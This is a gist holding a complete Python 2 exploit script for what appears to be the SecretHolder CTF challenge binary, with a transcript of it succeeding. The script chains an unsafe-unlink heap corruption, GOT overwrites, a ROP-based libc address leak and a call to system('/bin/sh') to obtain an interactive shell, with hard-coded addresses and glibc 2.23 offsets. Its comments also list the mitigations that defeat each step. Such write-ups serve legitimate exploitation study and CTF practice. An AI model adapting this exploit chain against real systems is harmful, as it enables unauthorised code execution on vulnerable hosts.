@inaz2
Last active October 13, 2016 10:12
$ python test.py
[+] unsafe unlink attack
[+] GOT overwrite to ROP
[+] leak libc address
[+] execute system('/bin/sh')
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
from minipwn import *
def keep_secret(s, level, buf):
    """Walk the target's menu to option 1 and submit ``buf`` as the secret.

    ``s`` is the connection object, ``level`` the size choice answered at the
    "Huge secret" prompt, ``buf`` the data written at "Tell me your secret".
    An empty ``buf`` is replaced by a single NUL byte so the write is never
    zero-length. (Option 1 is presumably "Keep secret", matching the name.)
    """
    dialogue = [
        ('3. Renew secret\n', '1'),
        ('3. Huge secret\n', str(level)),
    ]
    for prompt, answer in dialogue:
        recvuntil(s, prompt)
        sendline(s, answer)
    recvuntil(s, 'Tell me your secret: \n')
    s.sendall(buf if buf else '\x00')
def wipe_secret(s, level):
    """Walk the target's menu to option 2 for the given ``level``.

    ``s`` is the connection object; ``level`` is sent as the answer to the
    "Huge secret" size prompt. Nothing further is written. (Option 2 is
    presumably "Wipe secret", matching the name.)
    """
    dialogue = [
        ('3. Renew secret\n', '2'),
        ('3. Huge secret\n', str(level)),
    ]
    for prompt, answer in dialogue:
        recvuntil(s, prompt)
        sendline(s, answer)
def renew_secret(s, level, buf):
    """Walk the target's menu to option 3 and submit ``buf`` as the new secret.

    Same prompt sequence as ``keep_secret`` but with menu option 3
    ("Renew secret", per the menu text). ``level`` answers the size prompt;
    an empty ``buf`` is replaced by a single NUL byte.
    """
    dialogue = [
        ('3. Renew secret\n', '3'),
        ('3. Huge secret\n', str(level)),
    ]
    for prompt, answer in dialogue:
        recvuntil(s, prompt)
        sendline(s, answer)
    recvuntil(s, 'Tell me your secret: \n')
    s.sendall(buf if buf else '\x00')
# Driver script against the SecretHolder binary named below (apparently a CTF
# challenge build). Every numeric address in this file is specific to that
# exact binary and to the libc build shown in the transcript above
# (Ubuntu GLIBC 2.23-0ubuntu3); the script is Python 2 (print statements,
# raw_input, str-typed payloads).
# Defensive reading: the fixed program addresses presuppose a non-PIE build,
# the GOT writes presuppose a GOT that is still writable (no full RELRO), and
# the heap-metadata corruption relies on the allocator checks of that glibc
# version -- PIE, full RELRO and a current glibc each break a step here.
# Launch the binary locally; the commented-out line below is the remote variant.
s = connect_process(['./SecretHolder_d6c0bed6d695edc12a9e7733bedde182554442f8'])
#s = socket.create_connection(('localhost', 4444))
# Pause before sending anything (presumably to attach a debugger -- confirm).
raw_input()
print "[+] unsafe unlink attack"
# Order-sensitive allocate/free sequence over the three "levels". The repeated
# wipe of level 1 (after keep_secret(s, 3, '')) appears deliberate; do not
# reorder these calls.
keep_secret(s, 3, '')
wipe_secret(s, 3)
keep_secret(s, 1, '')
wipe_secret(s, 1)
keep_secret(s, 3, '')
wipe_secret(s, 1)
# Fixed address in the binary's data segment; the crafted buffer's pointer
# fields are derived from it.
addr_ptr_small = 0x6020B0
buf = '\x00' * 0x10
buf += p64(addr_ptr_small-0x18) + p64(addr_ptr_small-0x10)
buf += p64(0x20) + p64(0xfb0)
keep_secret(s, 1, '')
keep_secret(s, 2, '')
renew_secret(s, 3, buf)
wipe_secret(s, 2)
print "[+] GOT overwrite to ROP"
# Hard-coded GOT slots (memset, __stack_chk_fail -- names per the variables)
# and two code addresses inside the binary. Writable GOT entries are what
# make this stage possible; full RELRO would make them read-only.
got_memset = 0x602030
got_stack_fail = 0x602028
addr_ret = 0x400691
addr_read_a_lot = 0x4009F9
buf = '\x00' * 8
buf += p64(got_memset)
buf += p64(0)
buf += p64(got_stack_fail)
buf += p32(1) * 3
renew_secret(s, 1, buf)
renew_secret(s, 1, p64(addr_ret))
renew_secret(s, 2, p64(addr_read_a_lot))
print "[+] leak libc address"
# Binary-local gadget/PLT/main addresses; got_libc_start is presumably the GOT
# slot of __libc_start_main (confirm against the binary).
addr_pop_rdi = 0x400e03
got_libc_start = 0x602048
addr_plt_puts = 0x4006C0
addr_main = 0x400CC2
buf = '\x00' * 0x18
buf += p64(addr_pop_rdi)
buf += p64(got_libc_start)
buf += p64(addr_plt_puts)
buf += p64(addr_main)
recvuntil(s, '3. Renew secret\n')
s.sendall(buf)
# Single recv; ljust pads a short read to 8 bytes. How u64 treats a longer
# reply depends on minipwn (presumably first 8 bytes -- confirm).
data = s.recv(8192)
addr_libc_start = u64(data.ljust(8, '\x00'))
# Offsets from the leaked address to system() and a "/bin/sh" string are tied
# to the libc build in the transcript above; any other build needs new values.
addr_libc_system = addr_libc_start - 0x20740 + 0x45380
addr_libc_sh = addr_libc_start - 0x20740 + 0x18c58b
print "[+] execute system('/bin/sh')"
buf = '\x00' * 0x18
buf += p64(addr_pop_rdi)
buf += p64(addr_libc_sh)
buf += p64(addr_libc_system)
recvuntil(s, '3. Renew secret\n')
s.sendall(buf)
print "[+] got a shell!"
# Hand the connection over to the terminal (minipwn helper).
interact(s)